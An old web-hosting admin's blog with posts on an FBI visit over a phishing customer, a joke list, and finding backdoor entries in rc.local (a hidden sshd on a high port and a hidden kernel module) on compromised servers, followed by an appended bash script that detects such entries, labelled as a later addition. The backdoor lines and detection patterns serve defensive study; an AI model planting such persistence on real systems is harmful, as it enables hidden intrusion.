Welcome to NullMind's Lair, the blog of a cranky Web Hosting Geek

FBI

Wednesday, September 17th, 2003

Today the FBI came by the office to pick up some logs on a scammer that was hosting with us, after taking his site down we kept all the info and logs on him .. I hope they catch the sucker.

Basically the user had a fake e-gold site, he would send emails out to people saying they need to verify their e-gold accounts, people then would go to HIS site and enter their details and pin numbers :p

ouch ..

Null

THE CLASS OF 2006

Tuesday, September 9th, 2003

I read a good one today, so I thought I'd post it here

THE CLASS OF 2006
Just in case you weren’t feeling old enough today, this will
certainly change things. Each year the staff at Beloit College in
Wisconsin puts together a list to try to give the Faculty a sense of
the mindset of this year’s incoming freshman.


3 Apaches Down

Sunday, September 7th, 2003

this morning while checking the helpdesk I got a surprise .. 3 different servers for the same client had apache down, a manual restart would not bring it back to life, and worse .. no errors on the log.

upon further investigation I found this on rc.local


/etc/rc.d/init.d/.incsshd -p 31221
/sbin/insmod /etc/.incrl.o

unfortunately one of my techs also found it and deleted it .. seems the system was compromised .. but the other two .. no indication of any breaches.

the kernels are 2.4.18’s .. so I know they have the ptrace exploit .. time to do some recompiling

Null
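
A defensive check for the kind of rc.local entries described in the "3 Apaches Down" post, as an added example that is not part of the original blog: it scans a boot script for commands on hidden paths, kernel module loads, and an sshd-like binary on a non-default port. The function names, tag names and sample file contents are assumptions constructed for illustration.

```shell
#!/bin/bash
# Added example (not from the original post): flag boot-script lines that
# look like the two entries found in rc.local.
# Heuristics are assumptions, tune them for your own hosts:
#   HIDDEN    path with a dot-prefixed component (e.g. /etc/.name)
#   MODLOAD   insmod/modprobe called from a boot script
#   SSHD_PORT an sshd-like binary started with -p on a port other than 22
scan_boot_script() {
    # $1 = boot script to inspect; prints "lineno:TAGS:line" per finding
    local file=$1 n=0 line tags port
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        line=${line#"${line%%[![:space:]]*}"}      # trim leading whitespace
        case $line in ''|'#'*) continue ;; esac    # skip blanks and comments
        tags=""
        if printf '%s\n' "$line" | grep -Eq '/\.[^./[:space:]]'; then
            tags="HIDDEN"
        fi
        if printf '%s\n' "$line" | grep -Eq '(^|[[:space:]/])(insmod|modprobe)([[:space:]]|$)'; then
            tags="${tags:+$tags,}MODLOAD"
        fi
        port=$(printf '%s\n' "$line" |
            sed -n 's/.*sshd.*[[:space:]]-p[[:space:]]*\([0-9][0-9]*\).*/\1/p')
        if [ -n "$port" ] && [ "$port" != 22 ]; then
            tags="${tags:+$tags,}SSHD_PORT"
        fi
        if [ -n "$tags" ]; then printf '%s:%s:%s\n' "$n" "$tags" "$line"; fi
    done < "$file"
    return 0
}

# Constructed sample: a stock-looking rc.local plus the two lines from the post.
write_sample_rc() {
    cat > "$1" <<'EOF'
#!/bin/sh
# local startup commands
touch /var/lock/subsys/local
/usr/sbin/sshd -p 22
/etc/rc.d/init.d/.incsshd -p 31221
/sbin/insmod /etc/.incrl.o
EOF
}

sample=$(mktemp)
write_sample_rc "$sample"
scan_boot_script "$sample"
rm -f "$sample"
```

Running the same scan across every host of an affected client, before anyone deletes files, also preserves a record of which machines carried the entries.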